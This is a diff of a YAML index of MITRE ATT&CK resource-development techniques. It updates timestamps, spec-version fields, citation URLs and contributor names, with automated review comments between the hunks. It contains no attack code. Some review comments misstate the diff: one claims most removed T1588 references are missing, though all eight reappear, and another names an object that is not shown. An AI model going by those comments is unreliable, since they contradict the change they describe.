T1608.005:
technique:
- modified: '2024-04-13T14:03:24.673Z'
+ modified: '2024-10-16T20:09:41.391Z'
name: Link Target
description: "Adversaries may put in place resources that are referenced by
a link that can be used during targeting. An adversary may rely upon a user
@@ -54646,15 +55314,16 @@ resource-development:
to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope
Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect)
In addition, adversaries may serve a variety of malicious links through uniquely
- generated URIs/URLs.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI
- Use)(Citation: URI Unique) Finally, adversaries may take advantage of the
- decentralized nature of the InterPlanetary File System (IPFS) to host link
- targets that are difficult to remove.(Citation: Talos IPFS 2022)"
+ generated URIs/URLs (including one-time, single use links).(Citation: iOS
+ URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally,
+ adversaries may take advantage of the decentralized nature of the InterPlanetary
+ File System (IPFS) to host link targets that are difficult to remove.(Citation:
+ Talos IPFS 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Hen Porcilan
- Diyar Saadi Ali
- Nikola Kovac
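Review bot: in the rewrapped description the citation key is now split across a line boundary (`(Citation: iOS` / `URL Scheme)`). Inside a double-quoted YAML scalar a line break folds to a single space, so the parsed text still reads `(Citation: iOS URL Scheme)`, but any lint that greps the raw file for `(Citation: ...)` tokens will miss this one; if such a check exists in the repo, prefer breaking the line before the `(Citation:` token.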
@@ -54738,7 +55407,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.006:
technique:
@@ -54792,7 +55460,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.003:
technique:
@@ -54843,36 +55510,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - SOCCRATES
- - Mnemonic AS
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
- type: attack-pattern
- created: '2020-10-01T02:08:33.977Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588.002
- url: https://attack.mitre.org/techniques/T1588/002
- - source_name: Recorded Future Beacon 2019
- url: https://www.recordedfuture.com/identifying-cobalt-strike-servers/
- description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
- Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.'
- - source_name: Analyzing CS Dec 2020
- url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
- description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
- Fun and Profit. Retrieved October 12, 2021.
- modified: '2021-10-17T16:17:55.499Z'
+ modified: '2024-09-16T16:20:16.431Z'
name: Tool
description: |-
Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
@@ -54881,21 +55522,47 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - SOCCRATES
+ - Mnemonic AS
+ x_mitre_deprecated: false
x_mitre_detection: |-
In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
+ created: '2020-10-01T02:08:33.977Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588/002
+ external_id: T1588.002
+ - source_name: Analyzing CS Dec 2020
+ description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+ Fun and Profit. Retrieved October 12, 2021.
+ url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+ - source_name: Recorded Future Beacon 2019
+ description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
+ Future Identified Rogue Cobalt Strike Servers. Retrieved September 16, 2024.'
+ url: https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1584.006:
technique:
- modified: '2023-04-12T20:19:21.620Z'
+ modified: '2024-10-15T16:44:09.114Z'
name: Web Services
description: 'Adversaries may compromise access to third-party web services that
can be used during targeting. A variety of popular websites exist for legitimate
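Review bot: the Recorded Future Beacon 2019 URL changes from `/identifying-cobalt-strike-servers/` to `/blog/identifying-cobalt-strike-servers` together with `Retrieved September 16, 2024`, which is the right way to record a link migration. The removed T1588 block further down carries a second Recorded Future link (`Recorded Future Beacon Certificates`, `/cobalt-strike-servers/`); check that its re-emitted copy received the same treatment rather than keeping the old path under a new retrieved date.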
@@ -54941,17 +55608,16 @@ resource-development:
external_id: T1584.006
- source_name: Recorded Future Turla Infra 2020
description: 'Insikt Group. (2020, March 12). Swallowing the Snake’s Tail:
- Tracking Turla Infrastructure. Retrieved October 20, 2020.'
- url: https://www.recordedfuture.com/turla-apt-infrastructure/
+ Tracking Turla Infrastructure. Retrieved September 16, 2024.'
+ url: https://www.recordedfuture.com/research/turla-apt-infrastructure
- source_name: ThreatConnect Infrastructure Dec 2020
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
url: https://threatconnect.com/blog/infrastructure-research-hunting/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.001:
technique:
@@ -54977,7 +55643,7 @@ resource-development:
description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
March 6, 2017.
url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:37:34.563Z'
name: Social Media Accounts
description: "Adversaries may create and cultivate social media accounts that
can be used during targeting. Adversaries can create social media accounts
@@ -55009,8 +55675,6 @@ resource-development:
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Persona: Social Media'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.004:
technique:
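Review bot: T1585.001 leaves this diff with neither `spec_version` nor any `x_mitre_attack_spec_version` (both removed, nothing added), and its `modified` rolled back to 2021-10-16 in the preceding hunk. Objects elsewhere in the file are moved to `x_mitre_attack_spec_version: 3.2.0`, so this one now reads like a pre-2022 snapshot. If the generator simply copies whatever the upstream object carries, that is acceptable, but consumers that key on `x_mitre_attack_spec_version` will find it missing; confirm this is expected or have the generator emit a default.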
@@ -55037,7 +55701,7 @@ resource-development:
url: https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims
description: Stephen Sims. (2017, April 30). Microsoft Patch Analysis for
Exploitation. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:07:53.803Z'
name: Exploits
description: |-
Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)
@@ -55061,8 +55725,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1608.003:
technique:
@@ -55088,7 +55750,7 @@ resource-development:
url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:47:46.409Z'
name: Install Digital Certificate
description: "Adversaries may install SSL/TLS certificates that can be used
during targeting. SSL/TLS certificates are files that can be installed on
@@ -55122,8 +55784,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.002:
technique:
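Review bot: same pattern for T1608.003 as for T1587.004 two hunks above: `spec_version` and `x_mitre_attack_spec_version: 2.1.0` are both dropped with no replacement, and the object's `modified` was rolled back to a 2021 value in the adjacent hunk. Please list the objects that end up without `x_mitre_attack_spec_version` (T1588.001, T1585.001, T1587.004, T1608.003 in the visible part of this diff) in the PR description so the inconsistency with the 3.2.0 objects is a known state rather than a surprise.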
@@ -55171,7 +55831,7 @@ resource-development:
Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.
By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T21:22:13.578Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: DNS Server
x_mitre_detection: |-
@@ -55187,7 +55847,6 @@ resource-development:
- 'Domain Name: Passive DNS'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585:
technique:
@@ -55246,54 +55905,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
- type: attack-pattern
- created: '2020-10-01T01:56:24.776Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588
- url: https://attack.mitre.org/techniques/T1588
- - source_name: NationsBuying
- description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
- Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
- url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
- - url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
- description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
- Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
- Human Rights Defender. Retrieved December 12, 2016.'
- source_name: PegasusCitizenLab
- - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
- Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
- source_name: DiginotarCompromise
- url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
- - source_name: FireEyeSupplyChain
- description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
- SunshopFireEye. Retrieved March 6, 2017.'
- url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
- - source_name: Analyzing CS Dec 2020
- url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
- description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
- Fun and Profit. Retrieved October 12, 2021.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- - source_name: Recorded Future Beacon Certificates
- url: https://www.recordedfuture.com/cobalt-strike-servers/
- description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
- Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:19:41.568Z'
name: Obtain Capabilities
description: |-
Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.
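Review bot: eight `external_references` are removed from T1588 here (mitre-attack, NationsBuying, PegasusCitizenLab, DiginotarCompromise, FireEyeSupplyChain, Analyzing CS Dec 2020, Splunk Kovar Certificates 2017, Recorded Future Beacon Certificates). The `x_mitre_detection` text retained in the following hunk still cites FireEyeSupplyChain, Analyzing CS Dec 2020, Splunk Kovar Certificates 2017 and Recorded Future Beacon Certificates, so every one of these keys must reappear in the re-emitted `external_references`; only mitre-attack, PegasusCitizenLab and FireEyeSupplyChain are visible in the portion shown, so verify the remainder are present before merging.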
@@ -55304,22 +55919,66 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Certificate: Certificate Registration'
- 'Malware Repository: Malware Metadata'
- 'Internet Scan: Response Content'
- 'Malware Repository: Malware Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
+ created: '2020-10-01T01:56:24.776Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588
+ external_id: T1588
+ - source_name: PegasusCitizenLab
+ description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
+ Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
+ Human Rights Defender. Retrieved December 12, 2016.'
+ url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
+ - source_name: FireEyeSupplyChain
+ description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
+ SunshopFireEye. Retrieved March 6, 2017.'
+ url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
+ - source_name: DiginotarCompromise
+ description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+ Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+ url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+ - source_name: Recorded Future Beacon Certificates
+ description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+ Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+ url: https://www.recordedfuture.com/research/cobalt-strike-servers
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Analyzing CS Dec 2020
+ description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+ Fun and Profit. Retrieved October 12, 2021.
+ url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+ - source_name: NationsBuying
+ description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
+ Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
+ url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1650:
technique:
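Review bot: nearly every line in this hunk is key reordering from re-serialization, which buries the three substantive changes: `spec_version: '2.1'` is dropped, `x_mitre_attack_spec_version` moves from 2.1.0 to 3.2.0, and the Recorded Future reference now points at `https://www.recordedfuture.com/research/cobalt-strike-servers` with a retrieval date of September 16, 2024. If the generator can emit keys in a fixed order (the upstream STIX bundle's order, or sorted), future regenerations will diff down to the lines that actually changed. Please also confirm that dropping `spec_version` is intended for every object rather than a side effect of the source bundle; anything that filters on `spec_version == '2.1'` will stop matching.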
@@ -55382,37 +56041,38 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.007:
technique:
- modified: '2022-10-20T21:19:57.555Z'
+ modified: '2024-10-03T14:18:34.045Z'
name: Serverless
description: "Adversaries may compromise serverless cloud infrastructure, such
- as Cloudflare Workers or AWS Lambda functions, that can be used during targeting.
- By utilizing serverless infrastructure, adversaries can make it more difficult
- to attribute infrastructure used during operations back to them. \n\nOnce
- compromised, the serverless runtime environment can be leveraged to either
- respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
+ as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that
+ can be used during targeting. By utilizing serverless infrastructure, adversaries
+ can make it more difficult to attribute infrastructure used during operations
+ back to them. \n\nOnce compromised, the serverless runtime environment can
+ be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
traffic to an adversary-owned command and control server.(Citation: BlackWater
- Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated
- by these functions will appear to come from subdomains of common cloud providers,
- it may be difficult to distinguish from ordinary traffic to these providers.(Citation:
+ Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS
+ Apps Script Abuse 2021) As traffic generated by these functions will appear
+ to come from subdomains of common cloud providers, it may be difficult to
+ distinguish from ordinary traffic to these providers - making it easier to
+ [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation:
Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare
Workers)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
- x_mitre_detection: ''
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
+ x_mitre_contributors:
+ - Awake Security
x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Awake Security
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
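Review bot: the new description text reads `Google Apps Scripts`; the product is `Google Apps Script` (singular), so this is worth flagging upstream even though the line mirrors the ATT&CK source. The added `(Citation: GWS Apps Script Abuse 2021)` has a matching reference entry in the next hunk, and the version bump to 1.1 is consistent with a description change, so those check out. `x_mitre_detection: ''` remains empty even though the technique now links to Hide Infrastructure (T1665); that is upstream's call, but anyone expecting detection guidance for this sub-technique will find none.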
@@ -55436,11 +56096,14 @@ resource-development:
description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+ - source_name: GWS Apps Script Abuse 2021
+ description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+ Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.004:
technique:
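Review bot: the new `GWS Apps Script Abuse 2021` URL carries a `#google_vignette` fragment, which is an ad-interstitial anchor BleepingComputer appends client-side, not part of the article address; strip it so the reference reads `https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/`. If the index is meant to mirror upstream byte for byte, file the fix against the ATT&CK source instead.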
@@ -55498,17 +56161,18 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.006:
technique:
- modified: '2023-03-13T20:35:52.302Z'
+ modified: '2024-08-14T15:03:56.383Z'
name: SEO Poisoning
description: |-
Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)
To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)
+ In addition to internet search engines (such as Google), adversaries may also aim to manipulate specific in-site searches for developer platforms (such as GitHub) to deceive users towards [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) lures. In-site searches will rank search results according to their own algorithms and metrics such as popularity(Citation: Chexmarx-seo) which may be targeted and gamed by malicious actors.(Citation: Checkmarx-oss-seo)
+
Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)
SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)
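Review bot: the new SEO Poisoning paragraph runs `popularity` straight into `(Citation: Chexmarx-seo)` with no space, and that `source_name` is misspelled; it resolves only because the reference added later in this patch uses the same misspelled key, right next to the correctly spelled `Checkmarx-oss-seo`. If the key is corrected it must be corrected in both places in one change, or the citation will dangle. Unchanged context in this hunk also has "seasonably popular topics", which presumably should be "seasonally"; that one is upstream as well.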
@@ -55516,7 +56180,7 @@ resource-development:
- kill_chain_name: mitre-attack
phase_name: resource-development
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Vijay Lalwani
- Will Thomas, Equinix Threat Analysis Center (ETAC)
- Will Jolliffe
@@ -55530,7 +56194,7 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
@@ -55563,11 +56227,18 @@ resource-development:
description: Wang, J. (2018, October 17). Ubiquitous SEO Poisoning URLs. Retrieved
September 30, 2022.
url: https://www.zscaler.com/blogs/security-research/ubiquitous-seo-poisoning-urls-0
+ - source_name: Chexmarx-seo
+ description: 'Yehuda Gelb. (2023, November 30). The GitHub Black Market: Gaming
+ the Star Ranking Game. Retrieved June 18, 2024.'
+ url: https://zero.checkmarx.com/the-github-black-market-gaming-the-star-ranking-game-fc42f5913fb7
+ - source_name: Checkmarx-oss-seo
+ description: Yehuda Gelb. (2024, April 10). New Technique to Trick Developers
+ Detected in an Open Source Supply Chain Attack. Retrieved June 18, 2024.
+ url: https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.003:
technique:
@@ -55589,7 +56260,7 @@ resource-development:
description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
31, 2016.
source_name: Wikipedia Code Signing
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:19:50.018Z'
name: Code Signing Certificates
description: |-
Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
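Review bot: `modified` for T1588.003 moves backward, from 2022-04-25 to 2021-10-17, and the same regression appears later in this patch for T1588.005 (to 2021-04-15), T1596.003, T1597.002 and T1590.005. Anything that uses `modified` to decide whether a technique has changed will treat these entries as stale or skip them. This looks like the generator pulled these objects from a different, older source than the ones that moved forward to 2024; please confirm it is intended and not a mixed-bundle merge.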
@@ -55607,47 +56278,10 @@ resource-development:
